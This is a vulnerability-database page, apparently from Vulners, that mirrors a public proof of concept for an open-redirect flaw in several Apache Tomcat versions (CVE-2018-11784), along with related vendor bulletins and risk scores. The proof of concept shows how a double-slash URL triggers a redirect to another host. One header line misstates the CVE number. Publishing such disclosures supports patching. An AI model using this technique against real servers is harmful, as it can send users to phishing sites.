Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

Apache Tomcat 9.0.0M1 Open Redirect

🗓️ 11 Jul 2021 00:00:00Reported by Central InfosecType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 426 Views

Apache Tomcat 9.0.0M1 Open Redirect CVE-2018-1178

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Related
Code
ReporterTitlePublishedViews
Family
RedhatCVE		CVE-2018-11784
2 Nov 201909:34
redhatcve
F5 Networks		K64921482 : Apache Tomcat vulnerability CVE-2018-11784
25 Oct 201800:00
f5
IBM Security Bulletins		Security Bulletin: Security vulnerabilities in Apache Tomcat affect multiple IBM Rational products based on IBM's Jazz technology
28 Apr 202118:35
ibm
IBM Security Bulletins		Security Bulletin: IBM Sterling Control Center is vulnerable to Apache Tomcat vulnerability
14 Nov 202407:03
ibm
IBM Security Bulletins		Security Bulletin: Vulnerability in Apache Tomcat affects IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products ( CVE-2018-11784)
29 Mar 202301:48
ibm
IBM Security Bulletins		Security Bulletin: A vulnerability in Apache Tomcat affects the IBM FlashSystem 840 and 900
18 Feb 202301:45
ibm
IBM Security Bulletins		Security Bulletin: Vulnerability in Apache Tomcat affects IBM Platform Symphony
2 Jul 202102:32
ibm
IBM Security Bulletins		Security Bulletin: IBM QRadar SIEM is vulnerable to Apache Tomcat Publicly disclosed vulnerability (CVE-2018-11784)
5 Mar 201918:10
ibm
IBM Security Bulletins		Security Bulletin: Open Source Apache Tomcat vulnerabilities affect IBM Tivoli Application Dependency Discovery Manager (TADDM) (CVE-2018-11784)
27 Mar 201912:55
ibm
IBM Security Bulletins		Security Bulletin: IBM Integration Bus affected by Apache Tomcat (core only) vulnerability CVE-2018-11784
23 Mar 202020:41
ibm
Rows per page
`# Exploit Title: Apache Tomcat 9.0.0.M1 - Open Redirect  
# Date: 10/04/2018  
# Exploit Author: Central InfoSec  
# Version: Apache Tomcat 9.0.0.M1 to 9.0.0.11, 8.5.0 to 8.5.33, and 7.0.23 to 7.0.90  
# CVE : CVE-2018-11784  
  
# Proof of Concept:  
  
# Identify a subfolder within your application  
http://example.com/test/  
  
# Modify the URL to include at least 2 leading slashes before the subfolder and no trailing slash  
http://example.com//test  
  
# Browse to the newly created URL and the application will perform a redirection  
http://test/  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
11 Jul 2021 00:00Current
5.7Medium risk
Vulners AI Score5.7
EPSS0.87814
apache tomcat 9.0.0m1open redirectcve-2018-11784central infosec
426
.json
Report